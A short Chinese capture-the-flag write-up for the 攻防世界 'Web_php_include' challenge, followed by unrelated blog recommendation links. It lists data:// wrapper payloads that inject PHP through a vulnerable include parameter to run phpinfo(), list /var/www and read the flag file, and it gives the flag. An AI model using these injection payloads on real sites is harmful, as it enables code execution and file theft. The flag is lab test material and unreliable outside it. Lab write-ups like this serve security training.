攻防世界---Web_php_include

1.题目链接

2.补充知识:

3.构造:执行成功

/?page=data://text/plain,<?php phpinfo()?>

4.构造下面url,得到目录路径

/?page=data://text/plain,<?php echo $_SERVER['DOCUMENT_ROOT']?>

5构造下面url,读取该路径的文件

?page=data://text/plain,<?php print_r(scandir('/var/www')); ?>

6.构造下面url,读取fl4gisisish3r3.php内容。htmlspecialchars($a)在网页上显示文本 。

/?page=data://text/plain,<?php a=file_get_contents('fl4gisisish3r3.php'); echo htmlspecialchars(a); ?>

ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}

相关推荐
txzrxz11 分钟前
c++深度搜索讲解及例题
开发语言·c++·深度搜索·例题讲解
yu859395811 分钟前
时延估计的互相关算法(MATLAB实现)
开发语言·算法·matlab
ou.cs12 分钟前
c# SemaphoreSlim保姆级教程
开发语言·网络·c#
|_⊙13 分钟前
红黑树 (C++)
开发语言·c++·学习
Fate_I_C25 分钟前
Kotlin 内部类和嵌套类
java·开发语言·kotlin
程序员晓晓33 分钟前
【网络安全零基础入门】应急响应之服务器入侵排查,小白零基础入门到精通教程
服务器·web安全·计算机·网络安全·渗透测试·黑客技术·网安应急响应
昵称暂无133 分钟前
低代码平台深度测评:OutSystems vs Mendix谁更胜一筹
开发语言·低代码
We་ct40 分钟前
JS手撕:函数进阶 & 设计模式解析
开发语言·前端·javascript·设计模式·面试·前端框架
Michelle80231 小时前
R语言 for循环
开发语言·r语言
小碗羊肉1 小时前
【从零开始学Java | 第三十二篇】方法引用(Method Reference)
java·开发语言